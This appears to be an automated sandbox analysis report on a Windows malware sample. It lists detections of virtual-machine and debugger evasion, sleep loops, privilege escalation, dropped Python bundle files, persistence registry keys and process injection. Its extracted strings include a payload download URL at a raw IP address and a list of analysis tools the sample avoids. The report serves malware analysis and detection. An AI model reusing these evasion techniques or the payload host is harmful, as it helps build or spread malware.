SAFARI/537.3SEDEBUGPRIVILEGEREFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERPROCESSHACKER.EXEPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEHTTP://176.111.174.140/API/LOADER.BINVMWARE.EXEVMWARE-VMX.EXEVBOXSERVICE.EXEVBOXTRAY.EXESVCHOST.EXECHROMEBAD LOCALE NAMEIOS_BASE::BADBIT SETIOS_BASE::FAILBIT SETIOS_BASE::EOFBIT SET%SYSTEMROOT%\SYSTEM32\SVCHOST.EXE%08LX%04LX%LUZBI\.EXE.LNK\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCEDHIDDENSERVICESUNKNOWN.FIREFOX.EXEEXPLORER.EXE\MRT.EXE\MOZILLA\FIREFOX\PROFILES\*RELEASE

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC35F19 sldt word ptr [rax]

2_2_0FC35F19

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 7977	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3741	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6088	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 653	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 649	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\python38.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe	Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe	Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe	Evaded block: after key decision

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found evasive API chain checking for process token information

Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 7328	Thread sleep count: 150 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7328	Thread sleep time: -135000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7316	Thread sleep count: 7977 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7316	Thread sleep time: -71793000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7328	Thread sleep count: 107 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7328	Thread sleep time: -96300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7480	Thread sleep time: -3741000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7476	Thread sleep time: -1800000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7480	Thread sleep time: -6088000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17059EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	0_2_00007FF6E17059EC
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC06AE0 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,	2_2_0FC06AE0
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB59EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	3_2_00007FF699AB59EC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F59EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	4_2_00007FF7536F59EC
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B559EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	7_2_00007FF736B559EC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF632DA79B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA85A0 FindFirstFileExW,FindClose,	8_2_00007FF632DA85A0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA85A0 FindFirstFileExW,FindClose,	11_2_00007FF632DA85A0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	11_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	11_2_00007FF632DA79B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01343280 FindFirstFileExW,FindNextFileW,FindClose,	11_2_00007FFE01343280
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE0134303C FindFirstFileExW,FindNextFileW,FindClose,	11_2_00007FFE0134303C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E759EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	13_2_00007FF7F4E759EC

Source: C:\Windows\explorer.exe

Code function: 2_2_09CB2CE0 GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualQuery,VirtualAlloc,

2_2_09CB2CE0

Source: C:\Windows\explorer.exe

Thread delayed: delay time: 90000

Source: svchost.exe	Binary or memory string: vboxtray.exe
Source: explorer.exe, 00000002.00000002.2975609849.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.1740843885.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000002.00000000.1738931822.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000002.00000002.2975609849.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000003.2043977892.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: fNzx1wx8tL.exe	Binary or memory string: wcscpymsvcrt.dllwcscatwcscmpwcsncpywcslenstrlenreallocfreewcsstrCloseHandlekernel32.dllCreateFileWFreeLibraryMoveFileWGetFileSizeExGetWindowsDirectoryAGetVolumeInformationAGetTickCountwsprintfWuser32.dllwsprintfAVirtualAllocReadFileSleepVirtualFreeSetFilePointerCreateDirectoryWFindFirstFileWFindNextFileWFindCloseCopyFileWWriteFileGetSystemDirectoryWExitProcessCreateProcessWShellExecuteWshell32.dllGetModuleFileNameWGetShortPathNameWGetEnvironmentVariableWInternetOpenWwininet.dllInternetOpenUrlWHttpQueryInfoAInternetReadFileInternetConnectWHttpOpenRequestWHttpSendRequestAInternetCloseHandleSHGetFolderPathWSHGetFolderPathASHGetKnownFolderPathPathIsURLWshlwapi.dllPathCombineWPathFindFileNameWRegDeleteKeyWAdvapi32.dllRegOpenKeyExARegSetValueExARegCloseKeyOpenProcessTokenGetTokenInformationAdjustTokenPrivilegesGetUserNameWLookupPrivilegeValueACoUninitializeole32.dllCoCreateInstanceCoInitializeMessageBoxAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3SeDebugPrivilegeReflectiveLoaderSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolderProcessHacker.exeprocexp.exeprocexp64.exeTOTALCMD.exex64dbg.exehttp://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeChromebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemRoot%\system32\svchost.exe%08lX%04lX%luZBI\.exe.lnk\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHiddenServicesUnknown.firefox.exeexplorer.exe\MRT.exe\Mozilla\Firefox\Profiles\*release
Source: svchost.exe	Binary or memory string: vmware.exe
Source: explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000002.00000000.1740843885.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe	Binary or memory string: vmware-vmx.exe
Source: explorer.exe, 00000002.00000003.2043977892.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: svchost.exe	Binary or memory string: vboxservice.exe
Source: fNzx1wx8tL.exe, 00000000.00000003.1709851725.0000015FFE2BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeChromebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemR(
Source: explorer.exe, 00000002.00000002.2969120001.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000002.00000002.2973724478.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Process information queried: ProcessInformation

Found API chain indicative of debugger detection

Anti Debugging

Source: C:\Windows\explorer.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\svchost.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

0_2_00007FF6E1703C9C

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

0_2_00007FF6E171AE9C

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Enables debug privileges

Source: C:\Windows\System32\svchost.exe

Process token adjusted: Debug

Benign windows process drops PE files

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1714B34 SetUnhandledExceptionFilter,	0_2_00007FF6E1714B34
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1714978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6E1714978
Source: C:\Windows\explorer.exe	Code function: 2_2_09CB8104 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_09CB8104
Source: C:\Windows\explorer.exe	Code function: 2_2_09CC0370 SetUnhandledExceptionFilter,	2_2_09CC0370
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC27498 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0FC27498
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC322F0 SetUnhandledExceptionFilter,	2_2_0FC322F0
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC4B34 SetUnhandledExceptionFilter,	3_2_00007FF699AC4B34
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC4978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF699AC4978
